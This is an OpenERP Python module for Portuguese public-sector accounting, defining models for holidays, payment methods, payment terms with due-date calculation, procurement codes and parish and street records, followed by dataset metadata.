fields.one2many('sncp.comum.feriados', 'ano_id', u''), 'state': fields.integer(u'copiado') # 0 -- botão copiar disponivel # 1 -- ano ja esta copiado } def unlink(self, cr, uid, ids, context=None): if self.browse(cr, uid, ids[0]).name == date.today().year: raise osv.except_osv(_(u'Aviso'), _(u'Não pode apagar o ano corrente.')) ano_futuro_id = self.search(cr, uid, [('name', '=', self.browse(cr, uid, ids[0]).name + 1)]) if len(ano_futuro_id) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Não pode apagar o ano do meio do calendário.')) feriados_ids = self.pool.get('sncp.comum.feriados').search(cr, uid, [('ano_id', '=', ids[0])]) if len(feriados_ids) != 0: self.pool.get('sncp.comum.feriados').unlink(cr, uid, feriados_ids) # state 0 para anterior ano_anterior_id = self.search(cr, uid, [('name', '=', self.browse(cr, uid, ids[0]).name - 1)]) if len(ano_anterior_id) != 0: self.write(cr, uid, ano_anterior_id, {'state': 0}) return super(sncp_comum_calendario, self).unlink(cr, uid, ids) _defaults = {'state': 0} _sql_constraints = [ ('ano_unique', 'unique (name)', u'Este ano já está registado'), ] # ______________________________________________________FERIADOS_________________________________________ class sncp_comum_feriados(osv.Model): _name = 'sncp.comum.feriados' _description = u"Calendario/Feriados" def on_change_create(self, cr, uid, ids, tipo): if tipo == 'fix': return {} else: return {'warning': {'title': u'Feriados móveis', 'message': u'Os feriados móveis são inseridos manualmente para cada ano. ' u'Para automatizar o processo consulte o administrador de sistema.'}} _columns = { 'ano_id': fields.many2one('sncp.comum.calendario'), 'data': fields.date(u'Data', ), 'name': fields.char(u'Descrição', size=30, ), 'tipo': fields.selection([ ('fix', u'Fixo'), ('mov', u'Móvel'), ], u'Tipo', ), } def create(self, cr, uid, vals, context=None): data = None if type(vals['data']) in [str, unicode]: data = datetime.strptime(vals['data'], "%Y-%m-%d") elif type(vals['data']) is tuple: data = date(vals['data'][0], vals['data'][1], vals['data'][2]) vals['data'] = data feriado_id = super(sncp_comum_feriados, self).create(cr, uid, vals, context=context) return feriado_id def unlink(self, cr, uid, ids, context=None): return super(sncp_comum_feriados, self).unlink(cr, uid, ids) _order = 'data' _sql_constraints = [ ('data_unique', 'unique (data)', u'Esta data já está registada como feriado'), ] # __________________________________________________________CVP__________________________________________ class sncp_comum_cpv(osv.Model): _name = 'sncp.comum.cpv' _description = u"Vocabulário Comum para os Contratos Públicos" _columns = { 'name': fields.char(u'Descrição', size=255, ), 'codigo_120': fields.char(u'Código CPV', size=10, ), } _order = 'codigo_120' def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_comum_codigos_contab WHERE cpv_id = %d """ % obj.id) res_cod_contab = cr.fetchall() cr.execute(""" SELECT id FROM sncp_despesa_compromisso_dados_adic WHERE cpv_id = %d """ % obj.id) res_comp = cr.fetchall() if len(res_cod_contab) != 0 or len(res_comp): raise osv.except_osv(_(u'Aviso'), _(u'Verifique se o cpv ' + obj.name + u' têm associação em:\n' u'1. Códigos de Contabilização.\n' u'2. Compromissos.')) return super(sncp_comum_cpv, self).unlink(cr, uid, ids, context=context) _sql_constraints = [ ('codigo_cpv_unique', 'unique (codigo_120)', u'O código tem que ser único!'), ] # ______________________________________________________MEIOS PAGAMENTO__________________________________ class sncp_comum_meios_pagamento(osv.Model): _name = 'sncp.comum.meios.pagamento' _description = u"Meios de Pagamento" _rec_name = 'name' _columns = { 'metodo': fields.char(u'Método', size=3, ), 'name': fields.char(u'Descrição', ), 'meio': fields.selection([('cx', u'Caixa'), ('bk', u'Banco'), ('fm', u'Fundo de Maneio'), # ('dc', u'Documentos') ], u'Meio', ), 'tipo': fields.selection([('rec', 'Recebimento'), ('pag', 'Pagamento')], u'Recebimento/Pagamento', ), 'echeque': fields.boolean(u'É cheque?'), } def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_comum_param WHERE otes_mpag = %d OR desp_mpag = %d """ % (obj.id, obj.id)) res_param = cr.fetchall() cr.execute(""" SELECT id FROM sncp_despesa_pagamentos_ordem WHERE meio_pag_id = %d """ % obj.id) res_ordem = cr.fetchall() cr.execute(""" SELECT id FROM sncp_despesa_pagamentos_reposicoes WHERE meio_pag_id = %d """ % obj.id) res_repo = cr.fetchall() cr.execute(""" SELECT id FROM sncp_tesouraria_config_mapas WHERE meio_pag_id = %d """ % obj.id) res_tes_mapa = cr.fetchall() if len(res_ordem) != 0 or len(res_param) != 0 or len(res_repo) != 0 or len(res_tes_mapa) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Verifique se o meio de pagamento ' + obj.name + u' têm associação em:\n' u'1. Ordens de Pagamento.\n' u'2. Parâmetros.\n' u'3. Reposições.\n' u'4. Tesouraria\Configurações\Mapas.')) return super(sncp_comum_meios_pagamento, self).unlink(cr, uid, ids, context=context) _order = 'metodo' _sql_constraints = [ ('metodo_pagamento_unique', 'unique (metodo)', u'Este método já está registado'), ] # ______________________________________________________CONDIÇOES DE PAGAMENTO___________________________ class sncp_comum_cond_pagam(osv.Model): _name = 'sncp.comum.cond.pagam' _description = u"Condições de Pagamento" def on_change_anual_true(self, cr, uid, ids, anual): if anual is True: return { 'value': {'quantidade': 0, 'estado': 1, 'tipo': 'nap', 'contagem': 'napl'}} else: return { 'value': {'estado': 0, 'dia': 0, 'mes': False} } def _restrict_contagem(self, cr, uid, ids): obj = self.browse(cr, uid, ids[0]) if obj.anual is False and obj.contagem == 'napl': raise osv.except_osv(_(u'Aviso'), _(u'A contagem não pode ser "Não aplicável".')) return True def teste_anos(self, ano): if ano % 4 == 0: if ano % 100 == 0 and ano % 400 != 0: return False else: return True else: return False def teste_meses(self, mes, ano): if mes in [1, 3, 5, 7, 8, 10, 12]: return 31 elif mes in [4, 6, 9, 11]: return 30 elif mes in [2] and ano > 0: bi = self.teste_anos(ano) if bi: return 29 elif bi is False: return 28 elif mes in [2] and ano <= 0: return 28 def check_mes(self, mes, ano): novo_mes = mes novo_ano = ano while novo_mes > 12: novo_mes -= 12 novo_ano += 1 return novo_mes, novo_ano def da_data_vencimento(self, cr, uid, ids, vals, context=None): # vals = { # 'cond_pagam_id': , # 'dataemissao': datetime, # } obj = self.browse(cr, uid, vals['cond_pagam_id']) data_ini = vals['dataemissao'] data_venc = False if obj.anual is True: ano = data_ini.year mes_ini = data_ini.month dia_ini = data_ini.day if mes_ini > int(obj.mes): ano += 1 if mes_ini == int(obj.mes): if dia_ini > obj.dia: ano += 1 if int(obj.mes) == 2: if obj.dia > 28: if self.teste_anos(ano) is True: dia_ini = obj.dia else: dia_ini = 28 elif int(obj.mes) in [4, 6, 9, 11]: if obj.dia > 30: dia_ini = 30 else: dia_ini = obj.dia else: if obj.dia > 31: dia_ini = 31 else: dia_ini = obj.dia data_venc = date(ano, int(obj.mes), dia_ini) elif obj.anual is False: if obj.contagem == 'fmes': if data_ini.month < 12: data_ini = date(data_ini.year, data_ini.month + 1, 1) - timedelta(days=1) else: data_ini = date(data_ini.year + 1, 1, 1) - timedelta(days=1) elif obj.contagem == 'imes': data_ini = date(data_ini.year, data_ini.month, 1) elif obj.contagem == 'napl': raise osv.except_osv(_(u'receita/da_data_vencimento/contagem'), _(u'Ocorreu um erro inesperado, contacte o administrador do sistema.')) if obj.tipo == 'dia' and obj.contagem == 'imes': data_ini = data_ini - timedelta(days=1) # Teste ao tipo if obj.tipo == 'dia': data_venc = data_ini + timedelta(days=obj.quantidade) elif obj.tipo == 'mes': dia = data_ini.day mes = obj.quantidade + data_ini.month ano = data_ini.year tup = self.check_mes(mes, ano) ultimo_dia = self.teste_meses(tup[0], tup[1]) if dia > ultimo_dia: dia = ultimo_dia data_venc = date(tup[1], tup[0], dia) else: raise osv.except_osv(_(u'receita/da_data_vencimento/contagem'), _(u'Ocorreu um erro inesperado, contacte o administrador do sistema.')) if data_venc < vals['dataemissao']: if obj.tipo == 'dia': if data_venc.month < 12: data_venc = date(data_venc.year, data_venc.month + 1, data_venc.day) else: data_venc = date(data_venc.year + 1, 1, data_venc.day) elif obj.tipo == 'mes': if data_venc.month < 12: data_venc = date(data_venc.year, data_venc.month + 1, data_venc.day) else: data_venc = date(data_venc.year + 1, 1, data_venc.day) elif obj.anual is True: data_venc = date(data_venc.year + 1, data_venc.month, data_venc.day) if obj.dias_descanso == 'mant': return data_venc else: # Teste dos feriados e fim de semana db_sncp_comum_feriados = self.pool.get('sncp.comum.feriados') feriados_id = db_sncp_comum_feriados.search(cr, uid, [('data', '=', unicode(data_venc))]) while data_venc.weekday() >= 5 or len(feriados_id) != 0: if obj.dias_descanso == 'ante': data_venc = data_venc - timedelta(days=1) elif obj.dias_descanso == 'adia': data_venc = data_venc + timedelta(days=1) feriados_id = db_sncp_comum_feriados.search(cr, uid, [('data', '=', unicode(data_venc))]) return data_venc _columns = { 'name': fields.char(u'Código', size=3), 'descricao': fields.char(u'Descrição'), 'quantidade': fields.integer(u'Quantidade'), 'tipo': fields.selection([('dia', u'Dia'), ('mes', u'Mês'), ('nap', u'Não Aplicável'), ], u'Tipo'), 'contagem': fields.selection([('imed', u'Imediata'), ('imes', u'Início do mês'), ('fmes', u'Final do mês'), ('napl', u'Não Aplicável'), ], u'A contar de'), 'anual': fields.boolean(u'Anual'), 'dia': fields.integer(u'Dia'), # Testar as possibilidades quando tiver tempo 'mes': fields.selection([ ('1', u'Janeiro'), ('2', u'Fevereiro'), ('3', u'Março'), ('4', u'Abril'), ('5', u'Maio'), ('6', u'Junho'), ('7', u'Julho'), ('8', u'Agosto'), ('9', u'Setembro'), ('10', u'Outubro'), ('11', u'Novembro'), ('12', u'Dezembro'), ], u'Mês'), 'dias_descanso': fields.selection([('mant', u'Mantém'), ('ante', u'Antecipa'), ('adia', u'Adia'), ], u'Nos dias de descanso'), 'payment_term_id': fields.many2one('account.payment.term', u'Standard'), 'estado': fields.integer(u'Variavel de controlo de aparencias'), # 1: anual=true; tipo, contagem, quantidade readonly # 0: anual=false; dia, mes readonly } _order = 'name' _defaults = { 'estado': 0, 'dias_descanso': 'mant', 'dia': 1, } def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_comum_codigos_contab WHERE cond_pag_id = %d """ % obj.id) res_cod_contab = cr.fetchall() cr.execute(""" SELECT id FROM sncp_receita_controlo_config WHERE cond_pagam_id = %d """ % obj.id) res_controlo = cr.fetchall() if len(res_cod_contab) != 0 or len(res_controlo) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Verifique se a condição de pagamento ' + obj.name + u' têm associação em:\n' u'1. Códigos de Contabilização.\n' u'2. Receita\Controlo de Receitas Renováveis\Configurações' u'\Configuração Geral.')) return super(sncp_comum_cond_pagam, self).unlink(cr, uid, ids, context=context) def _name_limit(self, cr, uid, ids): obj = self.browse(cr, uid, ids[0]) re_name = re.compile('^([A-Z0-9]){1,3}$') if re.match(re_name, obj.name): return True else: raise osv.except_osv(_(u'Aviso'), _(u'O campo Código é composto por maiúsculas ou algarismos' u' no máximo de 3 carateres.')) def _dia_valido(self, cr, uid, ids): record = self.browse(cr, uid, ids[0]) if record.mes: ultimo_dia = self.teste_meses(int(record.mes), 0) if record.dia > ultimo_dia or record.dia <= 0: raise osv.except_osv(_(u'Aviso'), _(u'Para aquele mês o dia é inválido.')) return True _constraints = [ (_name_limit, u'', ['name']), (_restrict_contagem, u'', ['contagem']), (_dia_valido, u'', ['mes', 'dia']), ] _sql_constraints = [ ('cond_pagam_unique', 'unique (name)', u'Este código já existe!'), ('payment_term_unique', 'unique (payment_term_id)', u'Este Termo de Pagamento já existe!') ] # ______________________________________________________CODIGOS DE CONTABILIZAÇÃO________________________ class sncp_comum_codigos_contab(osv.Model): _name = 'sncp.comum.codigos.contab' _description = u"Codigos de Contabilização" def name_get(self, cr, uid, ids, context=None): if not ids: return [] if isinstance(ids, (int, long)): ids = [ids] reads = self.read(cr, uid, ids, ['name', 'code'], context=context) res = [] for record in reads: if record['code'] is False: code = '' else: code = record['code'] result = code + ' ' + record['name'] res.append((record['id'], result)) return res def get_code(self, cr, uid, ids, fields, arg, context): codigo = {} db_sncp_comum_codigos_contab = self.pool.get('sncp.comum.codigos.contab') for cod_contab_id in ids: obj = db_sncp_comum_codigos_contab.browse(cr, uid, cod_contab_id) codigo[cod_contab_id] = obj.item_id.default_code or None return codigo def get_ean13(self, cr, uid, ids, fields, arg, context): ean13 = {} db_sncp_comum_codigos_contab = self.pool.get('sncp.comum.codigos.contab') for cod_contab_id in ids: obj = db_sncp_comum_codigos_contab.browse(cr, uid, cod_contab_id) ean13[cod_contab_id] = obj.item_id.ean13 or None return ean13 def get_name_template(self, cr, uid, ids, fields, arg, context): name_template = {} db_sncp_comum_codigos_contab = self.pool.get('sncp.comum.codigos.contab') for cod_contab_id in ids: obj = db_sncp_comum_codigos_contab.browse(cr, uid, cod_contab_id) name_template[cod_contab_id] = obj.item_id.name_template or None return name_template _columns = { 'item_id': fields.many2one('product.product', u'Item'), 'code': fields.function(get_code, arg=None, method=False, type="char", string=u'Código', store=True), 'ean13': fields.function(get_ean13, arg=None, method=False, type="char", string=u'Código EAN 13', store=True), 'natureza': fields.selection([('rec', u'Receita Orçamental'), ('des', u'Despesa Orçamental'), ('ots', u'Operações de tesouraria')], u'Natureza'), 'name': fields.function(get_name_template, arg=None, method=False, type="char", string=u'Nome', store=True), 'conta_id': fields.many2one('account.account', u'Patrimonial', domain=[('type', 'not in', ['view'])], ), 'organica_id': fields.many2one('account.analytic.account', u'Orgânica', domain=[('tipo_dim', '=', 'uo'), ('type', '=', 'normal')], ), 'economica_id': fields.many2one('account.analytic.account', u'Económica', domain=[('tipo_dim', '=', 'ce'), ('type', '=', 'normal')], ), 'funcional_id': fields.many2one('account.analytic.account', u'Funcional', domain=[('tipo_dim', '=', 'cf'), ('type', '=', 'normal')], ), 'cond_pag_id': fields.many2one('sncp.comum.cond.pagam', u'Condições de Pagamento'), # # addons/receita/herancas.py/sncp_comum_codigos_contab met_juros_id' 'cpv_id': fields.many2one('sncp.comum.cpv', u'Vocabulário Comum Contr. Pública'), } _order = 'item_id, natureza' def _restrict_item_id(self, cr, uid, ids, context=None): obj = self.browse(cr, uid, ids[0]) return test_item_id(self, cr, uid, obj.item_id.id, obj.natureza) def write(self, cr, uid, ids, vals, context=None): if 'natureza' in vals: if vals['natureza'] == 'des': vals['cond_pag_id'] = False vals['met_juros_id'] = False elif vals['natureza'] in ['rec', 'ots']: vals['cpv_id'] = False return super(sncp_comum_codigos_contab, self).write(cr, uid, ids, vals, context=context) def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_despesa_descontos_retencoes WHERE cod_contab_id = %d """ % obj.id) res_desc = cr.fetchall() cr.execute(""" SELECT id FROM sncp_receita_controlo_config WHERE cod_contab_id = %d """ % obj.id) res_controlo = cr.fetchall() cr.execute(""" SELECT id FROM sncp_receita_fatura_modelo_linha WHERE cod_contab_id = %d """ % obj.id) res_modelo_linha = cr.fetchall() cr.execute(""" SELECT id FROM sncp_receita_guia_rec_linhas WHERE cod_contab_id = %d """ % obj.id) res_guia_linhas = cr.fetchall() if len(res_controlo) != 0 or len(res_desc) != 0 or len(res_modelo_linha) != 0 or \ len(res_guia_linhas): raise osv.except_osv(_(u'Aviso'), _(u'Verifique se o código de contabilização ' + obj.code + u' ' + obj.name + u' têm associação em:\n' u'1. Receita\Controlo de Receitas Renováveis\Configuração' u'\Configurações Gerais.\n' u'2. Descontos e Retenções.\n' u'3. Receita\Faturação Recorrente\Modelos de Faturas.\n' u'4. Guias de Receita.')) return super(sncp_comum_codigos_contab, self).unlink(cr, uid, ids, context=context) _constraints = [ (_restrict_item_id, u'', ['item_id']), ] # ========================================= REFERENCIAS GEOGRAFICAS ===================================== # __________________________________________ Freguesias ________________________________________________ class sncp_comum_freguesias(osv.Model): _name = 'sncp.comum.freguesias' _description = u"Freguesias" _columns = { 'name': fields.char(u'Nome de Freguesia', size=64), 'coord_centro': fields.char(u'Coordenadas do Centro', size=30), 'populacao': fields.integer(u'População'), 'eleitores': fields.integer(u'Eleitores inscritos'), } def _restrict_populacao(self, cr, uid, ids, context=None): obj = self.browse(cr, uid, ids[0]) if obj.populacao < 0: raise osv.except_osv(_(u'Aviso'), _(u'A população duma freguesia não pode ser negativa.')) else: return True def _restrict_eleitores(self, cr, uid, ids, context=None): obj = self.browse(cr, uid, ids[0]) if obj.eleitores < 0: raise osv.except_osv(_(u'Aviso'), _(u'O número de eleitores não pode ser negativo.')) else: return True def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_comum_bairros WHERE freguesia_id = %d """ % obj.id) res_bairro = cr.fetchall() cr.execute(""" SELECT id FROM sncp_comum_arruamentos WHERE freguesia1_id = %d OR freguesia2_id = %d """ % (obj.id, obj.id)) res_arru = cr.fetchall() cr.execute(""" SELECT id FROM sncp_receita_controlo WHERE freguesia_id = %d """ % obj.id) res_controlo = cr.fetchall() cr.execute(""" SELECT id FROM sncp_regproc_aquis_alien_parcel WHERE freguesia_id = %d """ % obj.id) res_alien_parcel = cr.fetchall() if len(res_controlo) != 0 or len(res_alien_parcel) != 0 or len(res_arru) != 0 or \ len(res_bairro) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Verifique se a freguesia ' + obj.name + u' têm associação em:\n' u'1. Receita\Controlo de Receitas Renováveis.\n' u'2. Aquisições e Alienações.\n' u'3. Arruamentos.\n' u'4. Bairros.')) return super(sncp_comum_freguesias, self).unlink(cr, uid, ids, context=None) _constraints = [ (_restrict_populacao, u'', ['populacao']), (_restrict_eleitores, u'', ['eleitores']), ] # __________________________________________ Bairros ________________________________________________ class sncp_comum_bairros(osv.Model): _name = 'sncp.comum.bairros' _description = u"Bairros" _columns = { 'name': fields.char(u'Nome do Bairro', size=64), 'coord_centro': fields.char(u'Coordenadas do Centro', size=30), 'freguesia_id': fields.many2one('sncp.comum.freguesias', u'Freguesia'), } def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_comum_arruamentos WHERE bairro_id = %d """ % obj.id) res_arru = cr.fetchall() cr.execute(""" SELECT id FROM sncp_receita_controlo WHERE bairro_id = %d """ % obj.id) res_controlo = cr.fetchall() if len(res_arru) != 0 or len(res_controlo) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Verifique se o bairro ' + obj.name + u' têm associação em:\n' u'1. Receita\Controlo de Receitas Renováveis.\n' u'2. Arruamentos.')) return super(sncp_comum_bairros, self).unlink(cr, uid, ids, context=context) # __________________________________________ Arruamentos ________________________________________________ class sncp_comum_arruamentos(osv.Model): _name = 'sncp.comum.arruamentos' _description = u"Arruamentos" def open_map(self, cr, uid, ids, context=None): if context is None: context = {} obj = self.browse(cr, uid, ids, context=context)[0] url = "http://maps.google.com/maps?oi=map&q=" if obj.name: url += obj.name.replace(' ', '+') if obj.bairro_id: url += '+' + obj.bairro_id.name.replace(' ', '+') if obj.freguesia1_id: url += '+' + obj.freguesia1_id.name.replace(' ', '+') return { 'type': 'ir.actions.act_url', 'url': url, 'target': 'new' } def open_inicio(self, cr, uid, ids, context=None): if context is None: context = {} obj = self.browse(cr, uid, ids, context=context)[0] url = "http://maps.google.com/maps?oi=map&q=" if obj.inicio_coord: url += '+' + obj.inicio_coord.replace(' ', '+') return { 'type': 'ir.actions.act_url', 'url': url, 'target': 'new' } def open_termo(self, cr, uid, ids, context=None): if context is None: context = {} obj = self.browse(cr, uid, ids, context=context)[0] url = "http://maps.google.com/maps?oi=map&q=" if obj.termo_coord: url += '+' + obj.termo_coord.replace(' ', '+') return { 'type': 'ir.actions.act_url', 'url': url, 'target': 'new' } _columns = { 'name': fields.char(u'Nome de Arruamento', size=64), 'inicio_desc': fields.char(u'Início', size=64), 'inicio_coord': fields.char(u'Coord. do Início', size=30, ), 'termo_desc': fields.char(u'Termo', size=64), 'termo_coord': fields.char(u'Coordenadas do Termo', size=30), 'bairro_id': fields.many2one('sncp.comum.bairros', u'Bairro'), 'freguesia1_id': fields.many2one('sncp.comum.freguesias', u'Freguesia'), 'freguesia2_id': fields.many2one('sncp.comum.freguesias', u'Freguesia'), 'n1_freg1': fields.char(u'Primeiro número', size=6), 'n2_freg1': fields.char(u'Último número', size=6), 'n1_freg2': fields.char(u'Primeiro número', size=6), 'n2_freg2': fields.char(u'Último número', size=6), } def _check_bairro(self, cr, uid, ids, context=None): obj = self.browse(cr, uid, ids[0]) if obj.bairro_id.freguesia_id.id == obj.freguesia1_id.id or\ obj.bairro_id.freguesia_id.id == obj.freguesia2_id.id: return True return False _constraints = [ (_check_bairro, u'O bairro seleccionado não pertence a freguesia', ['bairro_id']), ] def unlink(self, cr, uid, ids, context=None): for nid in ids: obj = self.browse(cr, uid, nid) cr.execute(""" SELECT id FROM sncp_receita_controlo WHERE arruamento_id = %d """ % obj.id) res_controlo = cr.fetchall() if len(res_controlo) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Verifique se o arruamento ' + obj.name + u' têm associação em:\n' u'1. Receita\Controlo de Receitas Renováveis.')) return super(sncp_comum_arruamentos, self).unlink(cr, uid, ids,) # ========================================= Avisos e notificações ===================================== class sncp_comum_etiquetas(osv.Model): _name = 'sncp.comum.etiquetas' _description = u'Etiquetas de Avisos e Notificações' _columns = { 'name': fields.char(u'Etiqueta', size=6), 'descr': fields.char(u'Descrição'), 'model_id': fields.many2one('ir.model', u'Modelo de dados'), 'path': fields.char(u'Caminho (notação de pontos)'), }
null
addons/comum/geral.py
geral.py
py
41,282
python
en
code
null
code-starcoder2
83
[ { "api_name": "openerp.osv.osv.except_osv", "line_number": 101, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 101, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 101, "usage_type": "call" }, { "api_name": "openerp.tools.translate._", "line_number": 102, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 130, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 130, "usage_type": "name" }, { "api_name": "datetime.datetime.strptime", "line_number": 146, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 146, "usage_type": "name" }, { "api_name": "datetime.date", "line_number": 158, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 160, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 162, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 164, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 166, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 168, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 170, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 172, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 174, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 176, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 178, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 180, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 182, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 184, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 186, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 188, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 190, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 192, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 194, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 196, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 204, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 208, "usage_type": "call" }, { "api_name": "openerp.osv.fields.integer", "line_number": 213, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 213, "usage_type": "name" }, { "api_name": "openerp.osv.fields.one2many", "line_number": 214, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 214, "usage_type": "name" }, { "api_name": "openerp.osv.fields.integer", "line_number": 215, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 215, "usage_type": "name" }, { "api_name": "datetime.date.today", "line_number": 221, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 221, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 222, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 222, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 222, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 225, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 225, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 225, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 244, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 244, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 257, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 257, "usage_type": "name" }, { "api_name": "openerp.osv.fields.date", "line_number": 258, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 258, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 259, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 259, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 260, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 260, "usage_type": "name" }, { "api_name": "datetime.datetime.strptime", "line_number": 268, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 268, "usage_type": "name" }, { "api_name": "datetime.date", "line_number": 270, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 288, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 288, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 293, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 293, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 294, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 294, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 318, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 318, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 318, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 332, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 332, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 339, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 339, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 340, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 340, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 341, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 341, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 346, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 346, "usage_type": "name" }, { "api_name": "openerp.osv.fields.boolean", "line_number": 348, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 348, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 387, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 387, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 387, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 406, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 406, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 427, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 427, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 427, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 500, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 505, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 505, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 507, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 507, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 509, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 511, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 511, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 511, "usage_type": "call" }, { "api_name": "openerp.tools.translate._", "line_number": 512, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 514, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 517, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 526, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 529, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 529, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 529, "usage_type": "call" }, { "api_name": "openerp.tools.translate._", "line_number": 530, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 535, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 537, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 540, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 542, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 544, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 554, "usage_type": "call" }, { "api_name": "datetime.timedelta", "line_number": 556, "usage_type": "call" }, { "api_name": "openerp.osv.fields.char", "line_number": 561, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 561, "usage_type": "name" }, { "api_name": 